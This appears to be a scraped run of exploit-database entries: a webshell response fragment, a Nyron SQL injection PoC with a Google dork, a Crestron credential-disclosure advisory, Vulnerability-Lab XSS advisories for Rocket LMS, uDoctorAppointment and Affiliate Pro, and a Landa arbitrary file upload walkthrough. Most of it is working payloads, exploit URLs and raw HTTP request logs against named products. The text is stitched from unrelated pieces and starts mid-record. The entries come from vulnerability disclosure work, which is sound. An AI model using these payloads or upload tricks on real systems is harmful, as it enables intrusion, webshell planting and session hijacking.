PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Connection: close # ------------------------------------------------------------------------------------------ # Webshell response # ------------------------------------------------------------------------------------------ HTTP/1.1 200 OK Date: Tue, 18 Jan 2022 00:51:29 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Content-Length: 16 Connection: close Content-Type: text/html; charset=UTF-8 <pre>0xSaudi </pre>

# Exploit Title: Nyron 1.0 - SQLi (Unauthenticated) # Google Dork: inurl:"winlib.aspx" # Date: 01/18/2021 # Exploit Author: Miguel Santareno # Vendor Homepage: http://www.wecul.pt/ # Software Link: http://www.wecul.pt/solucoes/bibliotecas/ # Version: < 1.0 # Tested on: windows # 1. Description Unauthenticated user can exploit SQL Injection vulnerability in thes1 parameter. # 2. Proof of Concept (PoC) https://vulnerable_webiste.com/Nyron/Library/Catalog/winlibsrch.aspx?skey=C8AF11631DCA40ADA6DE4C2E323B9989&pag=1&tpp=12&sort=4&cap=&pesq=5&thes1='"> # 3. Research: https://miguelsantareno.github.io/edp.pdf

# Exploit Title: Creston Web Interface 1.0.0.2159 - Credential Disclosure # Exploit Author: RedTeam Pentesting GmbH Advisory: Credential Disclosure in Web Interface of Crestron Device When the administrative web interface of the Crestron HDMI switcher is accessed unauthenticated, user credentials are disclosed which are valid to authenticate to the web interface. Details ======= Product: Crestron HD-MD4X2-4K-E Affected Versions: 1.0.0.2159 Fixed Versions: - Vulnerability Type: Information Disclosure Security Risk: high Vendor URL: https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E Vendor Status: decided not to fix Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009 Advisory Status: published CVE: CVE-2022-23178 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178 Introduction ============ "Crestron sets the gold standard for network security by leveraging the most advanced technologies including 802.1x authentication, AES encryption, Active Directory® credential management, JITC Certification, SSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to provide network security at the product level." (from the vendor's homepage) More Details ============ Upon visiting the device's web interface using a web browser, a login form is displayed requiring to enter username and password to authenticate. The analysis of sent HTTP traffic revealed that in addition to the loading of the website, a few more HTTP requests are automatically triggered. One of the associated responses contains a username and a password which can be used to authenticate as the affected user. Proof of Concept ================ Requesting the URL "http://crestron.example.com/" via a web browser results in multiple HTTP requests being sent. Among others, the following URL is requested: ------------------------------------------------------------------------ http://crestron.example.com/aj.html?a=devi&_=[...] ------------------------------------------------------------------------ This request results in a response similar to the following: ------------------------------------------------------------------------ HTTP/1.0 200 OK Cache-Control: no-cache Content-type: text/html { "login_ur": 0, "front_val": [ 0, 1 ], "uname": "admin", "upassword": "password" } ------------------------------------------------------------------------ The values for the keys "uname" and "upassword" could be used to successfully authenticate to the web interface as the affected user. Workaround ========== Reachability over the network can be restricted for access to the web interface, for example by using a firewall. Fix === No fix known. Security Risk ============= As user credentials are disclosed to visitors of the web interface they can directly be used to authenticate to it. The access allows to modify the device's input and output settings as well as to upload and install new firmware. Due to ease of exploitation and gain of administrative access this vulnerability poses a high risk. Timeline ======== 2021-10-06 Vulnerability identified 2021-11-15 Customer approved disclosure to vendor 2021-12-08 Vendor notified 2021-12-15 Vendor notified again 2021-12-21 Vendor response received: "The device in question doesn't support Crestron's security practices. We recommend the HD-MD-4KZ alternative." 2021-12-22 Requested confirmation, that the vulnerability will not be addressed. 2021-12-28 Vendor confirms that the vulnerability will not be corrected. 2022-01-12 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

# Exploit Title: Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS) # Exploit Author: Vulnerability-Lab # Date: 29/12/2021 Document Title: =============== Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS) References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2305 Release Date: ============= 2021-12-29 Vulnerability Laboratory ID (VL-ID): ==================================== 2305 Common Vulnerability Scoring System: ==================================== 5.4 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Rocket LMS is an online course marketplace with a pile of features that helps you to run your online education business easily. This product helps instructors and students to get in touch together and share knowledge. Instructors will be able to create unlimited video courses, live classes, text courses, projects, quizzes, files, etc and students will be able to use the educational material and increase their skill level. Rocket LMS is based on real business needs, cultural differences, advanced user researches so the product covers your business requirements efficiently. (Copy of the Homepage:https://lms.rocket-soft.org/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site scripting web vulnerability in the Rocket LMS v1.1 cms. Affected Product(s): ==================== Rocketsoft Product: Rocket LMS v1.1 - eLearning Platform CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-09-03: Researcher Notification & Coordination (Security Researcher) 2021-09-04: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2021-12-29: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Rocket LMS v1.1 cms web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerability is located in the support ticket message body. The message body does not sanitize the input of message. Remote attackers with low privileged application user accounts are able to inject own malicious script code with persistent attack vector. The request method to inject is post. After the inject the message a displayed again for the user and the backend for the support (admin). The issue can be exploited by organization, student and instructor account roles. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] conversations Support - New Ticket Vulnerable Input(s): [+] Subject Vulnerable Parameter(s): [+] title Affected Module(s): [+] Messages History Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. PoC: Payload <img src="evil.source" onload="alert(document.domain)"></img> --- PoC Session Logs (POST) --- https://lms.rocket-soft.org/panel/support/store Host: lms.rocket-soft.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 271 Origin:https://lms.rocket-soft.org Connection: keep-alive Referer:https://lms.rocket-soft.org/panel/support/new Cookie: webinar_session=eyJpdiI6ImNUeG9hcmFEbXFUSGxZd0NOZ3J6R0E9PSIsInZhbHVlIjoiWXFSOGRXYWFHcUUvc0VuNUpzanhBZjdBc21lRy8xaEhTU0hQTnk2YWlJM1ZHYkxXdzc3 T3U2Nm9yMEI3b2o2QmtCT2NjdEkyRVNwdlhWUjgwY0ZHWkNyVHJSdnBCck8vVWo4MFVsK2JvLzRDUm1BRm5zU2Y0SWZWdGR1b29keWwiLCJtYWMiOiIxODI3NDQ2OTcxZDMwNjA0M2U0 OGM3YzZmNmMzM2Y1OTk5ZTNiZTIzY2E2ZGQxMTlkYzY2YzY0Y2M5OTI5MTc5In0%3D; TawkConnectionTime=0; __tawkuuid=e::lms.rocket-soft.org::W9t6jOO76CukDtw wAughTc4sTzqsd2xAqZJpiyabjsp3sI9le/SuCBxWz7ekNzR0::2; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6Ik9iUEZFNlZBYjJSOEVjSE1hRlNiZFE9PSIsInZhbHVlIjoiR3F1RWFsb01KREQ2K05FaG5MT1hST1 pYNmx3Z3ZoU2lDOXBQL3h3aVg0T2k2a1YwVDZYR25nUnNCOXhsWjZnWjcrQTJxUzhEa3k2N1VEdjZkZGJFMXg3Q0pIWGx6VUZwajJGc09DdUlzaFpwb0t2SHJoaHkvQmh3bTJPM0RlWVh SRGszUlRqUVJNdlErMXpXYU5hZWlySWVrMktwZmp4RzNMSXV2TnAzTlFpQUhRalNKSmw2elhzVURqWVpqQlpkajAvUzBPcTV0Z0tXaFRFNkpmLy94TkFxa3dxdjlnOWk4VWpSRzMzeUVa UT0iLCJtYWMiOiJkMmQ3ZTk4NzllOTQ3ZTU4ZGRjMTljMjlkMzRkODhjMmI0Mzk5MjM1ZmJlYTc1NTAxYzI2OGI3YmMwMDczMmQxIn0%3D _token=3CmMP45TwUNoeNVPzZ4JuGunKoFqcUxbDWliz9rg&title=test1"><img src="evil.source" onload=alert(document.domain)></img>&type=course_support&webinar_id=1996&message=test2&attach= - POST: HTTP/1.1 302 Found Server: Apache/2 X-Powered-By: PHP/7.4.20 Location:https://lms.rocket-soft.org/panel/support Set-Cookie: webinar_session=eyJpdiI6Im5OVER1cno1OXJmQnRRb3QycHExN1E9PSIsInZhbHVlIjoiOGxXdHV5em95bGh0ejh3MXlRT3dwSXFGcUZzSmMzbHlJd2xFRDhweEFBS25JeFFrMzF2Wn lLdHc0MUpFQmN1cDY3SUE1V0hwVGRDUGZvRkRYZVYvY01BZ2NxT1NJWThXQnRiNnR3SDJ4TEZ5Q3BQUnZhR1lxUHZnR2hhLzEzSysiLCJtYWMiOiI1YjBlMmVjMjYwYjEzODVhZTJmZWZj YTlmMGJjMThkYzQ0ZjVmNjI0NTA1MGMxM2Q3ZGVlYjlhOGJkZTY3NmM0In0%3D; Max-Age=7200; path=/; httponly; samesite=lax Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Access-Control-Allow-Origin: * Access-Control-Allow-Headers: origin, x-requested-with, content-type Access-Control-Allow-Methods: PUT, GET, POST, DELETE, OPTIONS Content-Length: 210 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Vulnerable Source: conversations Support - New Ticket - Messages History <div class="rounded-sm mt-15 border panel-shadow p-15"> <div class="d-flex align-items-center justify-content-between pb-20 border-bottom border-gray300"> <div class="user-inline-avatar d-flex align-items-center"> <div class="avatar"> <img src="/store/995/60dce9eb4290c.png" class="img-cover" alt=""> </div> <div class="ml-10"> <span class="d-block text-dark-blue font-14 font-weight-500">Cameron Schofield</span> <span class="mt-1 font-12 text-gray d-block">user</span> </div></div> <div class="d-flex flex-column align-items-end"> <span class="font-12 text-gray">2021 Sep 9 | 12:58</span> </div></div> <p class="text-gray mt-15 font-weight-500 font-14">"<img src="evil.source" onload="alert(document.domain)"></img></p> </div> Reference(s): https://lms.rocket-soft.org/ https://lms.rocket-soft.org/panel/ https://lms.rocket-soft.org/panel/support https://lms.rocket-soft.org/panel/support/new https://lms.rocket-soft.org/panel/support/[id]/conversations Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

# Exploit Title: uDoctorAppointment v2.1.1 - 'Multiple' Cross Site Scripting (XSS) # Exploit Author: Vulnerability-Lab # Date: 15/12/2021 Document Title: =============== uDoctorAppointment v2.1.1 - Multiple XSS Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2288 Release Date: ============= 2021-12-15 Vulnerability Laboratory ID (VL-ID): ==================================== 2288 Common Vulnerability Scoring System: ==================================== 5 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Clinic management, doctor or therapist online medical appointment scheduling system for the management of health care. uDoctorAppointment script allows doctors to register and appropriate membership plan with different features. Patients can view doctor profiles before booking appointments. The site administrator or doctor may create and manage advanced schedules, create working time slots for each day of the week, define time off etc. (Copy of the Homepage:https://www.apphp.com/codemarket/items/1/udoctorappointment-php-script ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple non-persistent cross site web vulnerabilities in the uDoctorAppointment script web-application. Affected Product(s): ==================== ApPHP Product: uDoctorAppointment v2.1.1 - Health Care Script (PHP) (Web-Application) Product: ApPHP MVC Framework v1.1.5 (Framework) Vulnerability Disclosure Timeline: ================================== 2021-09-01: Researcher Notification & Coordination (Security Researcher) 2021-09-02: Vendor Notification (Security Department) 2021-09-10: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2021-12-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple non-persistent cross site vulnerabilities has been discovered in the official uDoctorAppointment v2.1.1 script web-application. The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application requests from the client-side. The cross site security web vulnerabilities are located in the `created_at`, `created_date` and `sent_at` parameters of the `filter` web module. The injection point is located in the parameters and the execution occurs in the filter module. The request method to inject the malicious script code is GET and the attack vector of the vulnerability is non-persistent on client-side. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Request Method(s): [+] GET Vulnerable Module(s): [+] ./doctorReviews/doctorReviews [+] ./orders/orders [+] /mailingLog/manage [+] /orders/doctorsManage [+] /news/manage [+] /newsSubscribers/manage [+] /doctorReviews/manage/status/approved [+] /appointments/manage Vulnerable Parameter(s): [+] created_at [+] created_date [+] sent_at [+] appointment_date Affected Module(s): [+] Filter Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without account and with low user interaction. For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue. Exploitation: Payload ">%20<img%20src="evil.source"%20onload=alert(document.domain)></img> Role: Patient (Frontend - created_at) https://doctor-appointment.localhost:8080/doctorReviews/doctorReviews?patient_name=test&created_at=2021-09-08&but_filter=Filter - https://doctor-appointment.localhost:8080/doctorReviews/doctorReviews?patient_name=test&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter Role: Doctor (Frontend - created_date) https://doctor-appointment.localhost:8080/orders/orders?order_number=test&created_date=2021-09-08&status=2&but_filter=Filter - https://doctor-appointment.localhost:8080/orders/orders?order_number=test&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&status=2&but_filter=Filter Role: Admin (Backend - https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=test1&email_content=test2&email_from=test3&email_to=test4&sent_at=2021-09-01&status=0&but_filter=Filter https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=2021-09-01&doctor_id=1&status=1&but_filter=Filter https://doctor-appointment.localhost:8080/news/manage?news_header=test1&created_at=2021-09-01&but_filter=Filter https://doctor-appointment.localhost:8080/newsSubscribers/manage?first_name=test1&last_name=test2&email=test%40aol.com&created_at=2021-09-01&but_filter=Filter https://doctor-appointment.localhost:8080/doctorReviews/manage/status/approved?doctor_first_name%2Cdoctor_last_name=test1&patient_name=test2&created_at=2021-09-01&but_filter=Filter https://doctor-appointment.localhost:8080/appointments/manage?appointment_number=test1&patient_first_name%2Cpatient_last_name=test2&doctor_first_name%2Cdoctor_last_name=test3&appointment_date=2021-09-01&but_filter=Filter https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=2021-09-01&doctor_id=1&status=1&but_filter=Filter - https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=test1&email_content=test2&email_from=test3&email_to=test4&sent_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&status=0&but_filter=Filter https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&doctor_id=1&status=1&but_filter=Filter https://doctor-appointment.localhost:8080/news/manage?news_header=test1&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter https://doctor-appointment.localhost:8080/newsSubscribers/manage?first_name=test1&last_name=test2&email=test%40aol.com&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter https://doctor-appointment.localhost:8080/doctorReviews/manage/status/approved?doctor_first_name%2Cdoctor_last_name=test1&patient_name=test2&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter https://doctor-appointment.localhost:8080/appointments/manage?appointment_number=test1&patient_first_name%2Cpatient_last_name=test2&doctor_first_name%2Cdoctor_last_name=test3&appointment_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&doctor_id=1&status=1&but_filter=Filter Vulnerable Source: ./mailingLog <div class="filtering-wrapper"> <form id="frmFilterMailingLog" action="mailingLog/manage" method="get"> Subject: <input id="email_subject" style="width:140px;" maxlength="125" type="text" value="a" name="email_subject"> Content: <input id="email_content" style="width:140px;" maxlength="125" type="text" value="b" name="email_content"> From: <input id="email_from" style="width:130px;" maxlength="125" type="text" value="c" name="email_from"> To: <input id="email_to" style="width:130px;" maxlength="125" type="text" value="d" name="email_to"> Date Sent: <input id="sent_at" maxlength="255" style="width:80px;" type="text" value=">" <img="" src="evil.source" onload="alert(document.cookie)" [MALICIOUS EXECUTABLE SCRIPT CODE PAYLOAD!] class="hasDatepicker"> <img class="ui-datepicker-trigger" src="assets/vendors/jquery/images/calendar.png" alt="..." title="..."> " name="sent_at" />Status: <select id="status" style="width: 90px; padding: 10px; display: none;" name="status" class="chosen-select-filter"> <option value="" selected="selected">--</option> <option value="0">Not Sent</option> <option value="1">Sent</option> </select><div class="chosen-container chosen-container-single chosen-container-single-nosearch" style="width: 90px;" title="" id="status_chosen"> <a class="chosen-single" tabindex="-1"><span>--</span><div><b></b></div></a><div class="chosen-drop"><div class="chosen-search"> <input type="text" autocomplete="off" readonly="" maxlength="255"></div><ul class="chosen-results"></ul></div></div>&nbsp; <div class="buttons-wrapper"> <input name="" class="button white" onclick="jQuery(location).attr('href','https://doctor-appointment.localhost:8080/mailingLog/manage');" type="button" value="Cancel"> <input name="but_filter" type="submit" value="Filter"> </div></form></div> --- PoC Session Logs (GET) --- https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=a&email_content=b&email_from=c&email_to=d&sent_at=>"<img+src%3D"evil.source"+onload%3Dalert(document.cookie)>++&status=&but_filter=Filter Host: doctor-appointment.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Cookie: isOpened=menu-04; apphp_9tmmw0krko=g2234alc8h8ks3ms2nsbp4tsa9 - GET: HTTP/1.1 200 OK Server: Apache Content-Length: 2914 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Reference(s): https://doctor-appointment.localhost:8080/ https://doctor-appointment.localhost:8080/mailingLog/ https://doctor-appointment.localhost:8080/news/manage https://doctor-appointment.localhost:8080/order/manage https://doctor-appointment.localhost:8080/mailingLog/manage https://doctor-appointment.localhost:8080/appointments/manage https://doctor-appointment.localhost:8080/orders/doctorsManage https://doctor-appointment.localhost:8080/newsSubscribers/manage Solution - Fix & Patch: ======================= The vulnerability can be resolved by a filter or secure encode of the vulnerable created_date, appointment_date, sent_at and create_at parameters. Disallow the usage of special chars in the affected parameters on get method requests. Sansitize the vulnerable output location to resolve the point of execution in the filter module. Credits & Authors: ================== Vulnerability-Lab [RESEARCH TEAM] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

# Exploit Title: Landa Driving School Management System 2.0.1 - Arbitrary File Upload # Version 2.0.1 # Google Dork: N/A # Date: 17/01/2022 # Exploit Author: Sohel Yousef - sohel.yousef@yandex.com # Software Link: https://codecanyon.net/item/landa-driving-school-management-system/23220151 Landa Driving School Management System contain arbitrary file upload registered user can upload .php5 files in attachments section with use of intercept tool in burbsuite to edit the raw details POST /profile/attachment/upload/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: */* Accept-Language: ar,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------215084716322124620333137564048 Content-Length: 294983 Origin: https://localhost Connection: close Referer: https://localhost/profile/91/ Cookie: CSRF-TOKEN=e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf; simcify=97a4436a6f7c5c5cd1fc43b903e3b760 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="name" sddd -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="csrf-token" e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="userid" 91 -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="attachment"; filename="w.php.png" >>>>>>>>>>>>>>>> change this to w.php5 Content-Type: image/png you will have a direct link to the uploaded files

# Exploit Title: Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS) # Exploit Author: Vulnerability-Lab # Date: 05/01/2022 Document Title: =============== Affiliate Pro v1.7 - Multiple Cross Site Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2281 Release Date: ============= 2022-01-05 Vulnerability Laboratory ID (VL-ID): ==================================== 2281 Common Vulnerability Scoring System: ==================================== 5.1 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Affiliate Pro is a Powerful and yet simple to use PHP affiliate Management System for your new or existing website. Let affiliates sell your products, bring you traffic or even leads and reward them with a commission. More importantly, use Affiliate Pro to track it intelligently to keep your affiliates happy and also your bottom line! So how does it work? It is pretty simple, when a user visits your website through an affiliate URL the responsible affiliate sending the traffic to you will receive a commission based on your settings. (Copy of the Homepage:https://jdwebdesigner.com/ &https://codecanyon.net/item/affiliate-pro-affiliate-management-system/12908496 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple reflected cross site scripting web vulnerabilities in the Affiliate Pro - Affiliate Management System v1.7. Affected Product(s): ==================== jdwebdesigner Product: Affiliate Pro v1.7 - Affiliate Management System (PHP) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-08-22: Researcher Notification & Coordination (Security Researcher) 2021-08-23: Vendor Notification (Security Department) 2021-08-30: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2022-01-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple reflected cross site scripting web vulnerabilities has been discovered in the Affiliate Pro - Affiliate Management System v1.7. The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise client-site browser to web-application requests. The non-persistent cross site scripting web vulnerabilities are located in the `email`,`username` and `fullname` parameters of the `index` module. Attackers are able to inject own malicious script code to the `Fullname`,`Username` or `Email` input fields to manipulate client-side requests. The request method to inject is post and the attack vector is non-persistent (reflected) on client-side. The injection- and execution points are located in the index formular for affiliates to enter. Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] index Vulnerable Input(s): [+] Email [+] Username [+] Fullname Vulnerable Parameter(s): [+] email [+] username [+] fullname Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers without account and with low or medium user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue. Exploitation: Payload <iframe src="javascript:alert(1337)"></iframe> %3cscript%3ealert(1337)%3c%2fscript%3 --- PoC Session Logs (POST) --- POST /affiliate-pro-demo/index HTTP/1.1 Host: affiliates-pro.localhost:8000 Origin:http://affiliates-pro.localhost:8000 Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24 Referer:http://affiliates-pro.localhost:8000/affiliate-pro-demo/ Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept: */* - fullname=<iframe src="javascript:alert(1337)"></iframe> &username=<iframe src="javascript:alert(1337)"></iframe>@pwnd.coml00fp%22%3e%3cscript%3ealert(1337)%3c%2fscript%3ewkgzv &p=test&confirmpwd=j2B%21p5o%21K8 - HTTP/1.1 200 OK Server: Apache Set-Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24; path=/; HttpOnly Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 6549 Content-Type: text/html; charset=UTF-8 Vulnerable Source: Index <div class="control-group"> <label class="control-label" for="fullname">Full Name</label> <div class="controls"> <input id="textinput" name="fullname" type="text" placeholder="Full Name" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required="required"> </div> </div> <div class="control-group"> <label class="control-label" for="username">Username</label> <div class="controls"> <input id="textinput" name="username" type="text" placeholder="username" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required> </div> </div> <div class="control-group"> <label class="control-label" for="email">E-Mail Address</label> <div class="controls"> <input id="textinput" name="email" type="email" placeholder="test@provider.com" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required> </div> Security Risk: ============== The security risk of the client-side cross site scripting vulnerabilities in the web-application are estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] 